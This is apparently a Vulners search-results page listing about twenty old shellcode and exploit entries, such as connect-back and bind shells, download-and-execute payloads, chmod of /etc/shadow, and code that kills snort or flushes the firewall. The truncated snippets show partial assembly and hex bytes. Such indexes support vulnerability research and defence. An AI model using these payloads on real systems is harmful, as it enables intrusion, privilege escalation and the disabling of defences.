CVE Search Engine - Security Vulnerabilities and Exploits Search Tool | Vulners.com

🔥 Daily Hot!

💪🏽 CPE Enhanced Advisories

🕶 Shadow Exploits

🕵🏼 Vulners CPE

🔐 Security news

💻 Exploit updates

📑 Blogs review

🐧 Linux vulnerabilities

🤖 AI High Score

show all

7260 matches found

seebug.org•added 2009/02/21 12:0 a.m.•18 views

Linux/x86 - execve(/bin/sh) - 16 bytes

No description provided by source. / $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ reusage-linux.c - re-use of "/bin/sh" string in .rodata Copyright c 2003 Marco Ivaldi [email protected] Short local shellcode for /bin/sh execve. It re-uses the "/bin/sh" string stored in the...

seebug.org•added 2009/02/21 12:0 a.m.•18 views

Linux/x86 - setuid(0) && execve() - 25 bytes

No description provided by source. Hi, i've shrinked down the shellcode to 25 bytes, the smallest setuid & execve GNU/Linux shellcode without nulls that spawns a shell. -------------------------------------------------------------------------------------- SMALLEST SETUID & EXECVE GNU/LINUX x86...

seebug.org•added 2009/02/21 12:0 a.m.•15 views

Linux/x86 - setuid / setgid / chroot break

No description provided by source. /----------------------------------------------------------------------/ / s390 shellcode 0x0a / 0x0 free / / setuid / setgid / chroot break / / code [email protected] / /----------------------------------------------------------------------/ char...

seebug.org•added 2009/02/21 12:0 a.m.•17 views

Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes

No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...

seebug.org•added 2009/02/21 12:0 a.m.•22 views

Linux/x86 - upload & exec

No description provided by source. UPLOAD & EXEC SHELLCODE 1 converting asm to hex 2 asm code 3 hex output 4 upload function This is an 'upload and exec' shellcode for the x86 platform. File has to be in executable format, cool if you know the distribution of the target, otherwise it is useless...

seebug.org•added 2009/02/21 12:0 a.m.•19 views

Linux/x86 - HTTP/1.x GET, Downloads & execve()

No description provided by source. / linux/x86 - HTTP/1.x GET, Downloads and execve - 111 bytes+ This shellcode allows you to download a ELF executable straight off a standard HTTP server and launch it. It will saved locally it into a filename called 'A' in the current directory. CONFIGURATION Th...

seebug.org•added 2009/02/21 12:0 a.m.•18 views

Linux/x86 - connect-back "11.22.33.44",31337/tcp - 90 bytes

No description provided by source. /--------------------------------------------------------------------------- 90 byte Connect Back shellcode by Russell Sanford - [email protected] --------------------------------------------------------------------------- filename: x86-linux-connect-back.c info:...

seebug.org•added 2009/02/21 12:0 a.m.•12 views

Linux/x86 - kill snort

No description provided by source. / x86 linux "snort IDS" shutter shellcode size 151 By nob0dy // find your own reality / / char snortshuttershellcode = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff" "\xff\x83\xc6\x0d\x31\xc9\xb1\x80\x80" "\x36\x01\x46\xe2\xfa\xea\x18\x2e\x74"...

seebug.org•added 2009/02/21 12:0 a.m.•13 views

Linux/mips - port bind 4919 - 276 bytes

No description provided by source. / - MIPS little-endian - linux port listener 276 bytes shellcode - execve"/bin/sh","/bin/sh",; - port 0x1337 4919 - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include "stdio.h" char...

seebug.org•added 2009/02/21 12:0 a.m.•27 views

Linux/x86 - connect-back 127.0.0.1:31337/tcp - 74 bytes

No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...

seebug.org•added 2009/02/21 12:0 a.m.•14 views

Linux/x86 - System Beep

No description provided by source. / By Thomas Rinsma meatth0mas.nl 16 apr. 2008 Shellcode makes system speaker beep once, 45 bytes: ; int fd = open"/dev/tty10", ORDONLY; push byte 5 pop eax cdq push edx push 0x30317974 push 0x742f2f2f push 0x7665642f mov ebx, esp mov ecx, edx int 80h ; ioctlfd,...

seebug.org•added 2009/02/21 12:0 a.m.•25 views

win32 XP sp2 (FR) Sellcode cmd.exe 32 bytes

No description provided by source. / windows/XP sp2 FR Sellcode cmd.exe 32 bytes Author : Mountassif Moad Big Thnx : Houssamix & SimO-s0fT Changed by : Stack Description : It is 32 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 FR My first original shellcode Here...

seebug.org•added 2009/02/21 12:0 a.m.•20 views

Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes

No description provided by source. / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema [email protected] / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta...

seebug.org•added 2009/02/21 12:0 a.m.•18 views

Linux/x86 - symlink /bin/sh xoring

No description provided by source. /The shellcode calls the symlink and makes the link to the /bin/sh in the current dir. short version with anti IDS xoring size = 56 bytes OS = BSD written by /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor ecx,e...

0day.today•added 2009/02/20 12:0 a.m.•34 views

linux/x86 chmod("/etc/shadow",666) & exit(0) 30 bytes

Exploit for linux/x86 platform in category shellcode ===================================================== linux/x86 chmod"/etc/shadow",666 & exit0 30 bytes ===================================================== / Linux/x86 - chmod"/etc/shadow",666 & exit0 Info reg ------------------ %eax = 15 %eb...

0day.today•added 2009/02/20 12:0 a.m.•15 views

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (xp sp2)

Exploit for unknown platform in category remote exploits ==================================================================== MS Internet Explorer 7 Memory Corruption Exploit MS09-002 xp sp2 ==================================================================== // Skyland win32 bindshell 28876/tcp...

Packet Storm•added 2009/02/20 12:0 a.m.•24 views

University of Washington IMAP Format String

/ This BUg Discover By Faryad Rahmany C0d3d by Faryad rahmany website : http://rahmany.net University Of Washington IMAP c-client Remote FOrmat String Shellcode based on work by vlad902 Greets to my best Freind : DJ7xpl UG : File Host Port Target Target 1 : WIndows XP Sp 1 : 0 Target 2 : Windows ...

seebug.org•added 2009/02/20 12:0 a.m.•17 views

Linux/x86 - chmod() 666 /etc/shadow & exit()

No description provided by source. / Linux/x86 - chmod 666 /etc/shadow & exit Info reg ------------------ %eax = 15 %ebx = /etc/shadow %ecx = 666 %eax = 1 %ebx = 0 Shellcode 30 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Disassembly of section .text:...

seebug.org•added 2009/02/20 12:0 a.m.•12 views

Linux/x86 - ipchains -F - 40 bytes

No description provided by source. / By Kris Katterjohn 11/18/2006 40 byte shellcode to flush ipchains for Linux x86 section .text global start start: ; execve"/sbin/ipchains", "/sbin/ipchains", "-F", NULL , NULL push byte 11 pop eax cdq push edx push word 0x462d mov ecx, esp push edx push word...

seebug.org•added 2009/02/20 12:0 a.m.•19 views

linux/x86 chmod(""/etc/shadow"" 666) & exit(0) 30 bytes

No description provided by source. / Linux/x86 - chmod"/etc/shadow",666 & exit0 Info reg ------------------ %eax = 15 %ebx = /etc/shadow %ecx = 666 %eax = 1 %ebx = 0 Shellcode 30 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Disassembly of section .text:...

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by